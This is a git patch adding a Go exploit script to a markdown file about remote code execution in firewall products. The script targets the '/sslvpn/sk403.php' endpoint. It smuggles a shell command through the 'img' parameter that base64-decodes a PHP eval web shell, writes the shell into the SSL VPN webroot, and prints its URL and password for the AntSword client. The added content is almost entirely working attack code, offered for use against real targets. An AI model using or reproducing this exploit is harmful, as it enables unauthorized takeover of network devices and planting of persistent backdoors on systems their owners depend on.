From 1d0db1e6ca8d7b957934443a0f113a765cab5423 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 7 Dec 2023 21:03:14 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E5=A4=9A=E4=B8=AA=E9=98=B2=E7=81=AB?= =?UTF-8?q?=E5=A2=99=E4=BA=A7=E5=93=81RCE.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 多个防火墙产品RCE.md | 99 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 99 insertions(+) diff --git a/多个防火墙产品RCE.md b/多个防火墙产品RCE.md index a05dc9f..238e988 100644 --- a/多个防火墙产品RCE.md +++ b/多个防火墙产品RCE.md @@ -385,3 +385,102 @@ func init() { )) } ``` + +## 另外一个点 +``` +package main + +import ( + "crypto/tls" + "fmt" + "github.com/fatih/color" + "github.com/hpifu/go-kit/hflag" + "github.com/imroc/req/v3" + "github.com/liushuochen/gotable" + "github.com/liushuochen/gotable/table" + "github.com/thanhpk/randstr" + "net/http" + "os" + "strings" + "time" +) + +func main() { + now := time.Now() + host, addr := getUserParams() + exploit(host, addr) + fmt.Println(color.GreenString("Total Use Time : %s\n", time.Since(now).String())) +} +func httpReqClient() *req.Client { + var reqHeader = map[string]string{ + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", + "Accept-Encoding": "gzip, deflate, br", + "Accept-Language": "zh-CN,zh-TW;q=0.9,zh;q=0.8", + "Connection": "close", + } + cli := req.C() + for reqHeaderName, reqHeaderValue := range reqHeader { + cli.SetCommonHeader(reqHeaderName, reqHeaderValue) + } + cli.EnableForceHTTP1() + cli.SetTLSFingerprintSafari() + cli.SetTimeout(time.Second * 15) + cli.SetRedirectPolicy(req.NoRedirectPolicy()) + cli.SetAutoDecodeAllContentType() + cli.TLSClientConfig = &tls.Config{InsecureSkipVerify: true, MinVersion: tls.VersionTLS10, MaxVersion: tls.VersionTLS13} + return cli +} + +func getUserParams() (host, proxyAddr string) { + hflag.AddFlag("target", "目标地址", hflag.Required(), hflag.Shorthand("t")) + hflag.AddFlag("proxy", "代理地址", hflag.Shorthand("p")) + if err := hflag.Parse(); err != nil { + fmt.Println(color.RedString("%s", hflag.Usage())) + os.Exit(1) + } + target := hflag.GetString("target") + proxyString := hflag.GetString("proxy") + return target, proxyString +} + +func randFile() string { + filename := randstr.Hex(8) + return filename +} +func fmtTable() *table.Table { + tab, _ := gotable.Create(color.GreenString("%s", "Shell连接工具"), color.RedString("%s", "Shell连接地址"), color.BlueString("%s", "Shell连接密码")) + return tab +} + +func exploit(t, p string) { + filename := randFile() + ".php" + vulPath := "/sslvpn/sk403.php?client=logoImg&img=/tmp|echo%20PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2MnXSk7Pz4=|base64%20-d|tee%20/usr/local/webui/sslvpn/" + filename + fullURL := strings.Replace(t+vulPath, "//ss", "/ss", 1) + client := httpReqClient() + if p != "" { + client.SetProxyURL(p) + } + get, err := client.R().Get(fullURL) + if err != nil { + fmt.Println(err) + } + defer func() { + _ = get.Body.Close() + }() + ShellURL := strings.Replace(t+"/sslvpn/"+filename, "//ss", "/ss", 1) + if get.StatusCode == http.StatusOK { + if strings.Contains(get.String(), "/usr/local/webui/sslvpn/") { + t2 := fmtTable() + _ = t2.AddRow([]string{ + "AntSword", ShellURL, "c", + }) + fmt.Println(t2) + return + } + } else { + fmt.Println(color.RedString("%s", "站点不存在漏洞,安全的很")) + return + } +} +```